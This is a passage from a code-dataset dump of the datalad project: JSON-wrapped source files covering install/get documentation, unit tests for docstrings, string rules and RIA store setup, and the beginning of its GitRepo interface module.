install ssh://me@localhost/path``\n\nFinally, DataLad supports SSH login style resource identifiers, such as ``me@localhost:/path``.\n\n``datalad install me@localhost:/path``\n\n\nCommands `install` vs `get`\n---------------------------\n\nThe ``install`` and ``get`` commands might seem confusingly similar at first.\nBoth of them could be used to install any number of subdatasets, and fetch\ncontent of the data files. Differences lie primarily in their default\nbehaviour and outputs, and thus intended use. Both ``install`` and ``get``\ntake local paths as their arguments, but their default behavior and output\nmight differ;\n\n- **install** primarily operates and reports at the level of **datasets**, and\n returns as a result dataset(s)\n which either were just installed, or were installed previously already under\n specified locations. So result should be the same if the same ``install``\n command ran twice on the same datasets. It **does not fetch** data files by\n default\n\n- **get** primarily operates at the level of **paths** (datasets, directories, and/or\n files). As a result it returns only what was installed (datasets) or fetched\n (files). So result of rerunning the same ``get`` command should report that\n nothing new was installed or fetched. It **fetches** data files by default.\n\nIn how both commands operate on provided paths, it could be said that ``install\n== get -n``, and ``install -g == get``. But ``install`` also has ability to\ninstall new datasets from remote locations given their URLs (e.g.,\n``https://datasets.datalad.org/`` for our super-dataset) and SSH targets (e.g.,\n``[login@]host:path``) if they are provided as the argument to its call or\nexplicitly as ``--source`` option. If ``datalad install --source URL\nDESTINATION`` (command line example) is used, then dataset from URL gets\ninstalled under PATH. In case of ``datalad install URL`` invocation, PATH is\ntaken from the last name within URL similar to how ``git clone`` does it. If\nformer specification allows to specify only a single URL and a PATH at a time,\nlater one can take multiple remote locations from which datasets could be\ninstalled.\n\nSo, as a rule of thumb -- if you want to install from external URL or fetch a\nsub-dataset without downloading data files stored under annex -- use ``install``.\nIn Python API ``install`` is also to be used when you want to receive in output the\ncorresponding Dataset object to operate on, and be able to use it even if you\nrerun the script. In all other cases, use ``get``.\n" }, { "alpha_fraction": 0.6077724099159241, "alphanum_fraction": 0.6157852411270142, "avg_line_length": 29.814815521240234, "blob_id": "055da9379f22212f86f2f879977b3ac2e6730a84", "content_id": "1ad9508a4f1203f429b49c77499e41f6dddc1c81", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2496, "license_type": "permissive", "max_line_length": 87, "num_lines": 81, "path": "/datalad/interface/tests/test_base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"test the holy grail of interfaces\n\n\"\"\"\n\nfrom datalad.cmd import (\n StdOutCapture,\n WitlessRunner,\n)\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_not_in,\n eq_,\n ok_,\n swallow_outputs,\n with_tempfile,\n)\n\nfrom ..base import update_docstring_with_parameters\n\n\n@with_tempfile(mkdir=True)\ndef test_status_custom_summary_no_repeats(path=None):\n from datalad.api import Dataset\n from datalad.core.local.status import Status\n\n # This regression test depends on the command having a custom summary\n # renderer *and* the particular call producing summary output. status()\n # having this method doesn't guarantee that it is still an appropriate\n # command for this test, but it's at least a necessary condition.\n ok_(hasattr(Status, \"custom_result_summary_renderer\"))\n\n ds = Dataset(path).create()\n out = WitlessRunner(cwd=path).run(\n [\"datalad\", \"--output-format=tailored\", \"status\"],\n protocol=StdOutCapture)\n out_lines = out['stdout'].splitlines()\n ok_(out_lines)\n eq_(len(out_lines), len(set(out_lines)))\n\n with swallow_outputs() as cmo:\n ds.status(return_type=\"list\", result_renderer=\"tailored\")\n eq_(out_lines, cmo.out.splitlines())\n\n\ndef test_update_docstring_with_parameters_no_kwds():\n from datalad.support.param import Parameter\n\n def fn(pos0):\n \"fn doc\"\n\n assert_not_in(\"3\", fn.__doc__)\n # Call doesn't crash when there are no keyword arguments.\n update_docstring_with_parameters(\n fn,\n dict(pos0=Parameter(doc=\"pos0 param doc\"),\n pos1=Parameter(doc=\"pos1 param doc\")),\n add_args={\"pos1\": 3})\n assert_in(\"3\", fn.__doc__)\n\n\ndef test_update_docstring_with_parameters_single_line_prefix():\n from datalad.support.param import Parameter\n\n def fn(pos0, pos1):\n pass\n\n update_docstring_with_parameters(\n fn,\n dict(pos0=Parameter(doc=\"pos0 param doc\"),\n pos1=Parameter(doc=\"pos1 param doc\")),\n prefix=\"This is a single line.\",\n )\n assert_in(\"This is a single line.\\n\\nParameters\\n\", fn.__doc__)\n" }, { "alpha_fraction": 0.5670102834701538, "alphanum_fraction": 0.5733544826507568, "avg_line_length": 44.03571319580078, "blob_id": "6d0bcd696503d05ad843295d7688864b1aa5e6a4", "content_id": "9e3be993893c74d9a615878b2197db1683830fd0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1261, "license_type": "permissive", "max_line_length": 87, "num_lines": 28, "path": "/datalad/tests/test_strings.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom ..support.strings import apply_replacement_rules\nfrom .utils_pytest import *\n\n\ndef test_apply_replacement_rules():\n # replacement rule should be at least 3 char long\n assert_raises(ValueError, apply_replacement_rules, '/', 'some')\n assert_raises(ValueError, apply_replacement_rules, ['/a/b', '/'], 'some')\n # and pattern should have the separator only twice\n assert_raises(ValueError, apply_replacement_rules, '/ab', 'some')\n assert_raises(ValueError, apply_replacement_rules, '/a/b/', 'some')\n\n eq_(apply_replacement_rules('/a/b', 'abab'), 'bbbb')\n eq_(apply_replacement_rules('/a/', 'abab'), 'bb')\n eq_(apply_replacement_rules(['/a/b'], 'abab'), 'bbbb')\n eq_(apply_replacement_rules(['/a/b', ',b,ab'], 'abab'), 'abababab')\n\n # with regular expression groups\n eq_(apply_replacement_rules(r'/st(.*)n(.*)$/\\1-\\2', 'string'), 'ri-g')\n" }, { "alpha_fraction": 0.6039362549781799, "alphanum_fraction": 0.6161199808120728, "avg_line_length": 31.530487060546875, "blob_id": "b28aa0815a470912dd722a51895cf58fb6db432d", "content_id": "908512316ed2abbc33b1de8bdc539444e3ee4bbb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5335, "license_type": "permissive", "max_line_length": 78, "num_lines": 164, "path": "/datalad/customremotes/tests/test_ria_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import tempfile\nfrom os.path import join\nfrom urllib.parse import quote\n\nfrom datalad.customremotes import ria_utils\nfrom datalad.customremotes.ria_utils import (\n UnknownLayoutVersion,\n create_ds_in_store,\n create_store,\n verify_ria_url,\n)\nfrom datalad.distributed.ora_remote import (\n LocalIO,\n SSHRemoteIO,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_raises,\n assert_true,\n rmtree,\n skip_ssh,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n on_windows,\n)\n\n\n@with_tempfile\ndef _test_setup_store(io_cls, io_args, store=None):\n io = io_cls(*io_args)\n store = Path(store)\n version_file = store / 'ria-layout-version'\n error_logs = store / 'error_logs'\n\n # invalid version raises:\n assert_raises(UnknownLayoutVersion, create_store, io, store, '2')\n\n # non-existing path should work:\n create_store(io, store, '1')\n assert_true(version_file.exists())\n assert_true(error_logs.exists())\n assert_true(error_logs.is_dir())\n assert_equal([f for f in error_logs.iterdir()], [])\n\n # empty target directory should work as well:\n rmtree(str(store))\n store.mkdir(exist_ok=False)\n create_store(io, store, '1')\n assert_true(version_file.exists())\n assert_true(error_logs.exists())\n assert_true(error_logs.is_dir())\n assert_equal([f for f in error_logs.iterdir()], [])\n\n # re-execution also fine:\n create_store(io, store, '1')\n\n # but version conflict with existing target isn't:\n version_file.write_text(\"2|unknownflags\\n\")\n assert_raises(ValueError, create_store, io, store, '1')\n # TODO: check output reporting conflicting version \"2\"\n\n\ndef test_setup_store():\n\n _test_setup_store(LocalIO, [])\n\n if on_windows:\n raise SkipTest('ora_remote.SSHRemoteIO stalls on Windows')\n\n skip_ssh(_test_setup_store)(SSHRemoteIO, ['datalad-test'])\n\n\n@with_tempfile\ndef _test_setup_ds_in_store(io_cls, io_args, store=None):\n io = io_cls(*io_args)\n store = Path(store)\n # ATM create_ds_in_store doesn't care what kind of ID is provided\n dsid = \"abc123456\"\n\n ds_path = store / dsid[:3] / dsid[3:] # store layout version 1\n version_file = ds_path / 'ria-layout-version'\n archives = ds_path / 'archives'\n objects = ds_path / 'annex' / 'objects'\n git_config = ds_path / 'config'\n\n # invalid store version:\n assert_raises(UnknownLayoutVersion,\n create_ds_in_store, io, store, dsid, '1', 'abc')\n\n # invalid obj version:\n assert_raises(UnknownLayoutVersion,\n create_ds_in_store, io, store, dsid, 'abc', '1')\n\n # version 1\n create_store(io, store, '1')\n create_ds_in_store(io, store, dsid, '1', '1')\n for p in [ds_path, archives, objects]:\n assert_true(p.is_dir(), msg=\"Not a directory: %s\" % str(p))\n for p in [version_file]:\n assert_true(p.is_file(), msg=\"Not a file: %s\" % str(p))\n assert_equal(version_file.read_text(), \"1\\n\")\n\n # conflicting version exists at target:\n assert_raises(ValueError, create_ds_in_store, io, store, dsid, '2', '1')\n\n # version 2\n # Note: The only difference between version 1 and 2 are supposed to be the\n # key paths (dirhashlower vs mixed), which has nothing to do with\n # setup routine.\n rmtree(str(store))\n create_store(io, store, '1')\n create_ds_in_store(io, store, dsid, '2', '1')\n for p in [ds_path, archives, objects]:\n assert_true(p.is_dir(), msg=\"Not a directory: %s\" % str(p))\n for p in [version_file]:\n assert_true(p.is_file(), msg=\"Not a file: %s\" % str(p))\n assert_equal(version_file.read_text(), \"2\\n\")\n\n\ndef test_setup_ds_in_store():\n\n _test_setup_ds_in_store(LocalIO, [])\n\n if on_windows:\n raise SkipTest('ora_remote.SSHRemoteIO stalls on Windows')\n\n skip_ssh(_test_setup_ds_in_store)(SSHRemoteIO, ['datalad-test'])\n\n\ndef test_verify_ria_url():\n # unsupported protocol\n assert_raises(ValueError,\n verify_ria_url, 'ria+ftp://localhost/tmp/this', {})\n # bunch of caes that should work\n cases = {\n 'ria+file:///tmp/this': (None, '/tmp/this'),\n # no normalization\n 'ria+file:///tmp/this/': (None, '/tmp/this/'),\n # with hosts\n 'ria+ssh://localhost/tmp/this': ('ssh://localhost', '/tmp/this'),\n 'ria+http://localhost/tmp/this': ('http://localhost', '/tmp/this'),\n 'ria+https://localhost/tmp/this': ('https://localhost', '/tmp/this'),\n # with username\n 'ria+ssh://humbug@localhost/tmp/this':\n ('ssh://humbug@localhost', '/tmp/this'),\n # with port\n 'ria+ssh://humbug@localhost:2222/tmp/this':\n ('ssh://humbug@localhost:2222', '/tmp/this'),\n 'ria+ssh://localhost:2200/tmp/this':\n ('ssh://localhost:2200', '/tmp/this'),\n # with password\n 'ria+https://humbug:1234@localhost:8080/tmp/this':\n ('https://humbug:1234@localhost:8080', '/tmp/this'),\n # document a strange (MIH thinks undesirable), but pre-existing\n # behavior an 'ssh example.com' would end up in the user HOME,\n # not in '/'\n 'ria+ssh://example.com': ('ssh://example.com', '/')\n }\n for i, o in cases.items():\n # we are not testing the URL rewriting here\n assert o == verify_ria_url(i, {})[:2]\n" }, { "alpha_fraction": 0.5551326870918274, "alphanum_fraction": 0.5587309002876282, "avg_line_length": 36.73237609863281, "blob_id": "da05ee694ef5f83e5cdfed4c05acd49c5844949a", "content_id": "e85695461b53fc25bff0fcaabc216bac6fe9a343", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28903, "license_type": "permissive", "max_line_length": 96, "num_lines": 766, "path": "/datalad/dataset/gitrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Core interface to Git repositories\n\nAt the moment the GitRepo class provided here is not meant to be used\ndirectly, but is primarily a vehicle for a slow refactoring process.\n\nWhile is could be used directly in some cases, note that the singleton\nhandling implemented here will not allow switching between this\nimplementation and the old-standard from datalad.support.gitrepo for the\nlifetime of a singleton.\n\"\"\"\n\n__all__ = ['GitRepo']\n\nimport logging\nimport re\nimport threading\nimport time\nfrom contextlib import contextmanager\nfrom locale import getpreferredencoding\nfrom os import environ\nfrom os.path import lexists\nfrom typing import Optional\nfrom weakref import (\n finalize,\n WeakValueDictionary\n)\n\nfrom datalad.cmd import (\n GitWitlessRunner,\n StdOutErrCapture,\n)\nfrom datalad.config import ConfigManager\nfrom datalad.dataset.repo import (\n PathBasedFlyweight,\n RepoInterface,\n path_based_str_repr,\n)\nfrom datalad.runner.nonasyncrunner import (\n STDERR_FILENO,\n STDOUT_FILENO,\n)\nfrom datalad.runner.protocol import GeneratorMixIn\nfrom datalad.runner.utils import (\n AssemblingDecoderMixIn,\n LineSplitter,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n GitIgnoreError,\n InvalidGitRepositoryError,\n PathKnownToRepositoryError,\n)\nfrom datalad.utils import (\n ensure_list,\n lock_if_required,\n Path,\n)\n\n\nlgr = logging.getLogger('datalad.dataset.gitrepo')\n\npreferred_encoding = getpreferredencoding(do_setlocale=False)\n\n\n@contextmanager\ndef git_ignore_check(expect_fail,\n stdout_buffer,\n stderr_buffer):\n try:\n yield None\n except CommandError as e:\n e.stdout = \"\".join(stdout_buffer) if stdout_buffer else (e.stdout or \"\")\n e.stderr = \"\".join(stderr_buffer) if stderr_buffer else (e.stderr or \"\")\n ignore_exception = _get_git_ignore_exception(e)\n if ignore_exception:\n raise ignore_exception\n lgr.log(5 if expect_fail else 11, str(e))\n raise\n\n\ndef _get_git_ignore_exception(exception):\n ignored = re.search(GitIgnoreError.pattern, exception.stderr)\n if ignored:\n return GitIgnoreError(cmd=exception.cmd,\n msg=exception.stderr,\n code=exception.code,\n stdout=exception.stdout,\n stderr=exception.stderr,\n paths=ignored.groups()[0].splitlines())\n return None\n\n\n@path_based_str_repr\nclass GitRepo(RepoInterface, metaclass=PathBasedFlyweight):\n \"\"\"Representation of a Git repository\n\n \"\"\"\n # Could be used to e.g. disable automatic garbage and autopacking\n # ['-c', 'receive.autogc=0', '-c', 'gc.auto=0']\n _GIT_COMMON_OPTIONS = [\n \"-c\", \"diff.ignoreSubmodules=none\",\n # To gain consistent, albeit possibly insecure (?) behavior of git/git-annex\n # in quoting or note the paths.\n # Behavior of git-annex on treating this setting has changed around\n # 10.20230407-18-gdf6f9f1ee8 where it started to respect default =true and\n # quote. See https://github.com/datalad/datalad/pull/7372#issuecomment-1533507701\n \"-c\", \"core.quotepath=false\",\n ]\n _git_cmd_prefix = [\"git\"] + _GIT_COMMON_OPTIONS\n\n # Begin Flyweight:\n\n _unique_instances = WeakValueDictionary()\n\n def _flyweight_invalid(self):\n return not self.is_valid()\n\n @classmethod\n def _flyweight_reject(cls, id_, *args, **kwargs):\n pass\n\n @classmethod\n def _cleanup(cls, path):\n # Ben: I think in case of GitRepo there's nothing to do ATM. Statements\n # like the one in the out commented __del__ above, don't make sense\n # with python's GC, IMO, except for manually resolving cyclic\n # references (not the case w/ ConfigManager ATM).\n lgr.log(1, \"Finalizer called on: GitRepo(%s)\", path)\n\n def __hash__(self):\n # the flyweight key is already determining unique instances\n # add the class name to distinguish from strings of a path\n return hash((self.__class__.__name__, self.__weakref__.key))\n\n # End Flyweight\n\n def __init__(self, path):\n # A lock to prevent multiple threads performing write operations in parallel\n self._write_lock = threading.Lock()\n\n # Note, that the following three path objects are used often and\n # therefore are stored for performance. Path object creation comes with\n # a cost. Most notably, this is used for validity checking of the\n # repository.\n self.pathobj = Path(path)\n self.dot_git = _get_dot_git(self.pathobj, ok_missing=True)\n self._valid_git_test_path = self.dot_git / 'HEAD'\n\n self._cfg = None\n self._git_runner = GitWitlessRunner(cwd=self.pathobj)\n\n self.__fake_dates_enabled = None\n\n self._line_splitter = None\n\n # Finally, register a finalizer (instead of having a __del__ method).\n # This will be called by garbage collection as well as \"atexit\". By\n # keeping the reference here, we can also call it explicitly.\n # Note, that we can pass required attributes to the finalizer, but not\n # `self` itself. This would create an additional reference to the object\n # and thereby preventing it from being collected at all.\n self._finalizer = finalize(self, GitRepo._cleanup, self.pathobj)\n\n def __eq__(self, obj):\n \"\"\"Decides whether or not two instances of this class are equal.\n\n This is done by comparing the base repository path.\n \"\"\"\n return self.pathobj == obj.pathobj\n\n def is_valid(self_or_path):\n \"\"\"Returns whether the underlying repository appears to be still valid\n\n This method can be used as an instance method or a class method.\n \"\"\"\n # preserving notes from the original implementations in GitRepo\n #\n # Note, that this almost identical to the classmethod is_valid_repo().\n # However, if we are testing an existing instance, we can save Path object\n # creations. Since this testing is done a lot, this is relevant. Creation\n # of the Path objects in is_valid_repo() takes nearly half the time of the\n # entire function.\n\n # Also note, that this method is bound to an instance but still\n # class-dependent, meaning that a subclass cannot simply overwrite it.\n # This is particularly important for the call from within __init__(),\n # which in turn is called by the subclasses' __init__. Using an overwrite\n # would lead to the wrong thing being called.\n if not isinstance(self_or_path, GitRepo):\n # called like a classmethod, perform test without requiring\n # a repo instance\n if not isinstance(self_or_path, Path):\n self_or_path = Path(self_or_path)\n dot_git_path = self_or_path / '.git'\n return (dot_git_path.exists() and (\n not dot_git_path.is_dir() or (dot_git_path / 'HEAD').exists()\n )) or (self_or_path / 'HEAD').exists()\n else:\n # called as a method of a repo instance\n return self_or_path.dot_git.exists() and (\n not self_or_path.dot_git.is_dir()\n or self_or_path._valid_git_test_path.exists()\n )\n\n @property\n def cfg(self):\n \"\"\"Get a ConfigManager instance for this repository\n\n Returns\n -------\n ConfigManager\n \"\"\"\n if self._cfg is None:\n # associate with this dataset and read the entire config hierarchy\n self._cfg = ConfigManager(dataset=self, source='any')\n return self._cfg\n\n @property\n def _fake_dates_enabled(self):\n \"\"\"Is the repository configured to use fake dates?\n\n This is an internal query performance helper for the datalad.fake-dates\n config option.\n \"\"\"\n if self.__fake_dates_enabled is None:\n self.__fake_dates_enabled = \\\n self.cfg.getbool('datalad', 'fake-dates', default=False)\n return self.__fake_dates_enabled\n\n def add_fake_dates_to_env(self, env=None):\n \"\"\"Add fake dates to `env`.\n\n Parameters\n ----------\n env : dict, optional\n Environment variables.\n\n Returns\n -------\n A dict (copied from env), with date-related environment\n variables for git and git-annex set.\n \"\"\"\n env = (env if env is not None else environ).copy()\n # Note: Use _git_custom_command here rather than repo.git.for_each_ref\n # so that we use annex-proxy in direct mode.\n last_date = list(self.for_each_ref_(\n fields='committerdate:raw',\n count=1,\n pattern='refs/heads',\n sort=\"-committerdate\",\n ))\n\n if last_date:\n # Drop the \"contextual\" timezone, leaving the unix timestamp. We\n # avoid :unix above because it wasn't introduced until Git v2.9.4.\n last_date = last_date[0]['committerdate:raw'].split()[0]\n seconds = int(last_date)\n else:\n seconds = self.cfg.obtain(\"datalad.fake-dates-start\")\n seconds_new = seconds + 1\n date = \"@{} +0000\".format(seconds_new)\n\n lgr.debug(\"Setting date to %s\",\n time.strftime(\"%a %d %b %Y %H:%M:%S +0000\",\n time.gmtime(seconds_new)))\n\n env[\"GIT_AUTHOR_DATE\"] = date\n env[\"GIT_COMMITTER_DATE\"] = date\n env[\"GIT_ANNEX_VECTOR_CLOCK\"] = str(seconds_new)\n\n return env\n\n def _generator_call_git(self,\n args,\n *,\n files=None,\n env=None,\n pathspec_from_file: Optional[bool]=False,\n sep=None):\n \"\"\"\n Call git, yield stdout and stderr lines when available. Output lines\n are split at line ends or `sep` if `sep` is not None.\n\n Parameters\n ----------\n sep : str, optional\n Use `sep` as line separator. Does not create an empty last line if\n the input ends on sep. The lines contain the separator, if it exists.\n\n All other parameters match those described for `call_git`.\n\n Returns\n -------\n Generator that yields tuples of `(file_no, line)`, where `file_no` is\n either:\n\n - `datalad.runner.nonasyncrunner.STDOUT_FILENO` for stdout, or\n - `datalad.runner.nonasyncrunner.STDERR_FILENO` for stderr,\n\n and `line` is the next result line, split on `sep`, or on standard line\n ends.\n\n Raises\n ------\n CommandError if the call exits with a non-zero status.\n \"\"\"\n\n class GeneratorStdOutErrCapture(GeneratorMixIn,\n AssemblingDecoderMixIn,\n StdOutErrCapture):\n \"\"\"\n Generator-runner protocol that captures and yields stdout and stderr.\n \"\"\"\n def __init__(self):\n GeneratorMixIn.__init__(self)\n AssemblingDecoderMixIn.__init__(self)\n StdOutErrCapture.__init__(self)\n\n def pipe_data_received(self, fd, data):\n if fd in (1, 2):\n self.send_result((fd, self.decode(fd, data, self.encoding)))\n else:\n StdOutErrCapture.pipe_data_received(self, fd, data)\n\n cmd = self._git_cmd_prefix + args\n\n if files:\n # only call the wrapper if needed (adds distraction logs\n # otherwise, and also maintains the possibility to connect\n # stdin in the future)\n generator = self._git_runner.run_on_filelist_chunks_items_(\n cmd,\n files,\n protocol=GeneratorStdOutErrCapture,\n env = env,\n pathspec_from_file = pathspec_from_file,\n )\n elif files is not None:\n # it was an empty structure, so we did provide paths but \"empty\",\n # then we must not return anything. For more reasoning see\n # ec0243c92822f36ada5e87557eb9f5f53929c9ff which added similar code pattern\n # within get_content_info\n return\n else:\n generator = self._git_runner.run(\n cmd,\n protocol=GeneratorStdOutErrCapture,\n env=env)\n\n line_splitter = {\n STDOUT_FILENO: LineSplitter(sep, keep_ends=True),\n STDERR_FILENO: LineSplitter(sep, keep_ends=True)\n }\n\n for file_no, content in generator:\n if file_no in (STDOUT_FILENO, STDERR_FILENO):\n for line in line_splitter[file_no].process(content):\n yield file_no, line\n else:\n raise ValueError(f\"unknown file number: {file_no}\")\n\n for file_no in (STDOUT_FILENO, STDERR_FILENO):\n remaining_content = line_splitter[file_no].finish_processing()\n if remaining_content is not None:\n yield file_no, remaining_content\n\n def _call_git(self,\n args,\n files=None,\n expect_stderr=False,\n expect_fail=False,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n read_only=False):\n \"\"\"Allows for calling arbitrary commands.\n\n Internal helper to the call_git*() methods.\n Unlike call_git, _call_git returns both stdout and stderr.\n The parameters, return value, and raised exceptions match those\n documented for `call_git`, with the exception of env, which allows to\n specify the custom environment (variables) to be used.\n \"\"\"\n runner = self._git_runner\n stderr_log_level = {True: 5, False: 11}[expect_stderr]\n\n read_write = not read_only\n if read_write and self._fake_dates_enabled:\n env = self.add_fake_dates_to_env(env if env else runner.env)\n\n output = {\n STDOUT_FILENO: [],\n STDERR_FILENO: [],\n }\n\n with lock_if_required(read_write, self._write_lock), \\\n git_ignore_check(expect_fail, output[STDOUT_FILENO], output[STDERR_FILENO]):\n\n for file_no, line in self._generator_call_git(args,\n files=files,\n env=env,\n pathspec_from_file=pathspec_from_file,\n ):\n output[file_no].append(line)\n\n for line in output[STDERR_FILENO]:\n lgr.log(stderr_log_level,\n \"stderr| \" + line.rstrip(\"\\n\"))\n return (\n \"\".join(output[STDOUT_FILENO]),\n \"\".join(output[STDERR_FILENO]))\n\n def call_git(self, args, files=None,\n expect_stderr=False, expect_fail=False,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n read_only=False):\n \"\"\"Call git and return standard output.\n\n Parameters\n ----------\n args : list of str\n Arguments to pass to `git`.\n files : list of str, optional\n File arguments to pass to `git`. The advantage of passing these here\n rather than as part of `args` is that the call will be split into\n multiple calls to avoid exceeding the maximum command line length.\n expect_stderr : bool, optional\n Standard error is expected and should not be elevated above the DEBUG\n level.\n expect_fail : bool, optional\n A non-zero exit is expected and should not be elevated above the\n DEBUG level.\n pathspec_from_file : bool, optional\n Could be set to True for a `git` command which supports\n --pathspec-from-file and --pathspec-file-nul options. Then pathspecs\n would be passed through a temporary file.\n read_only : bool, optional\n By setting this to True, the caller indicates that the command does\n not write to the repository, which lets this function skip some\n operations that are necessary only for commands the modify the\n repository. Beware that even commands that are conceptually\n read-only, such as `git-status` and `git-diff`, may refresh and write\n the index.\n\n Returns\n -------\n standard output (str)\n\n Raises\n ------\n CommandError if the call exits with a non-zero status.\n \"\"\"\n return \"\".join(\n self.call_git_items_(args,\n files,\n expect_stderr=expect_stderr,\n expect_fail=expect_fail,\n env=env,\n pathspec_from_file=pathspec_from_file,\n read_only=read_only,\n keep_ends=True))\n\n def call_git_items_(self,\n args,\n files=None,\n expect_stderr=False,\n expect_fail=False,\n env=None,\n pathspec_from_file: Optional[bool] = False,\n read_only=False,\n sep=None,\n keep_ends=False):\n \"\"\"\n Call git, yield output lines when available. Output lines are split\n at line ends or `sep` if `sep` is not None.\n\n Parameters\n ----------\n sep : str, optional\n Use sep as line separator. Does not create an empty last line if\n the input ends on sep.\n\n All other parameters match those described for `call_git`.\n\n Returns\n -------\n Generator that yields stdout items, i.e. lines with the line ending or\n separator removed.\n\n Please note, this method is meant to be used to process output that is\n meant for 'interactive' interpretation. It is not intended to return\n stdout from a command like \"git cat-file\". The reason is that\n it strips of the line endings (or separator) from the result lines,\n unless 'keep_ends' is True. If 'keep_ends' is False, you will not know\n which line ending was stripped (if 'separator' is None) or whether a\n line ending (or separator) was stripped at all, because the last line\n may not have a line ending (or separator).\n\n If you want to reliably recreate the output set 'keep_ends' to True and\n \"\".join() the result, or use 'GitRepo.call_git()' instead.\n\n Raises\n ------\n CommandError if the call exits with a non-zero status.\n \"\"\"\n\n read_write = not read_only\n if read_write and self._fake_dates_enabled:\n env = self.add_fake_dates_to_env(\n env if env else self._git_runner.env)\n\n stderr_lines = []\n\n with lock_if_required(read_write, self._write_lock), \\\n git_ignore_check(expect_fail, None, stderr_lines):\n\n for file_no, line in self._generator_call_git(\n args,\n files=files,\n env=env,\n pathspec_from_file=pathspec_from_file,\n sep=sep):\n if file_no == STDOUT_FILENO:\n if keep_ends is True:\n yield line\n else:\n if sep:\n yield line.rstrip(sep)\n else:\n yield line.rstrip()\n else:\n stderr_lines.append(line)\n\n stderr_log_level = {True: 5, False: 11}[expect_stderr]\n for line in stderr_lines:\n lgr.log(stderr_log_level, \"stderr| \" + line.strip(\"\\n\"))\n\n def call_git_oneline(self, args, files=None, expect_stderr=False,\n pathspec_from_file: Optional[bool] = False,\n read_only=False):\n \"\"\"Call git for a single line of output.\n\n All other parameters match those described for `call_git`.\n\n Raises\n ------\n CommandError if the call exits with a non-zero status.\n AssertionError if there is more than one line of output.\n \"\"\"\n lines = list(self.call_git_items_(args, files=files,\n expect_stderr=expect_stderr,\n pathspec_from_file=pathspec_from_file,\n read_only=read_only))\n if len(lines) > 1:\n raise AssertionError(\n \"Expected {} to return single line, but it returned {}\"\n .format([\"git\"] + args, lines))\n return lines[0]\n\n def call_git_success(self, args, files=None, expect_stderr=False,\n pathspec_from_file: Optional[bool] = False,\n read_only=False):\n \"\"\"Call git and return true if the call exit code of 0.\n\n All parameters match those described for `call_git`.\n\n Returns\n -------\n bool\n \"\"\"\n try:\n self._call_git(\n args, files, expect_fail=True, expect_stderr=expect_stderr,\n pathspec_from_file=pathspec_from_file,\n read_only=read_only)\n\n except CommandError:\n return False\n return True\n\n def init(self, sanity_checks=True, init_options=None):\n \"\"\"Initializes the Git repository.\n\n Parameters\n ----------\n create_sanity_checks: bool, optional\n Whether to perform sanity checks during initialization if the target\n path already exists, such as that new repository is not created in\n the directory where git already tracks some files.\n init_options: list, optional\n Additional options to be appended to the `git-init` call.\n \"\"\"\n pathobj = self.pathobj\n path = str(pathobj)\n\n if not lexists(path):\n pathobj.mkdir(parents=True)\n elif sanity_checks:\n # Verify that we are not trying to initialize a new git repository\n # under a directory some files of which are already tracked by git\n # use case: https://github.com/datalad/datalad/issues/3068\n try:\n stdout, _ = self._call_git(\n ['-C', path, 'ls-files'],\n expect_fail=True,\n read_only=True,\n )\n if stdout:\n raise PathKnownToRepositoryError(\n \"Failing to initialize new repository under %s where \"\n \"following files are known to a repository above: %s\"\n % (path, stdout)\n )\n except CommandError:\n # assume that all is good -- we are not under any repo\n pass\n\n cmd = ['-C', path, 'init']\n cmd.extend(ensure_list(init_options))\n lgr.debug(\n \"Initializing empty Git repository at '%s'%s\",\n path,\n ' %s' % cmd[3:] if cmd[3:] else '')\n\n stdout, stderr = self._call_git(\n cmd,\n # we don't want it to scream on stdout\n expect_fail=True,\n # there is no commit, and none will be made\n read_only=True)\n\n # after creation we need to reconsider .git path\n self.dot_git = _get_dot_git(self.pathobj, ok_missing=True)\n\n return self\n\n def for_each_ref_(self, fields=('objectname', 'objecttype', 'refname'),\n pattern=None, points_at=None, sort=None, count=None,\n contains=None):\n \"\"\"Wrapper for `git for-each-ref`\n\n Please see manual page git-for-each-ref(1) for a complete overview\n of its functionality. Only a subset of it is supported by this\n wrapper.\n\n Parameters\n ----------\n fields : iterable or str\n Used to compose a NULL-delimited specification for for-each-ref's\n --format option. The default field list reflects the standard\n behavior of for-each-ref when the --format option is not given.\n pattern : list or str, optional\n If provided, report only refs that match at least one of the given\n patterns.\n points_at : str, optional\n Only list refs which points at the given object.\n sort : list or str, optional\n Field name(s) to sort-by. If multiple fields are given, the last one\n becomes the primary key. Prefix any field name with '-' 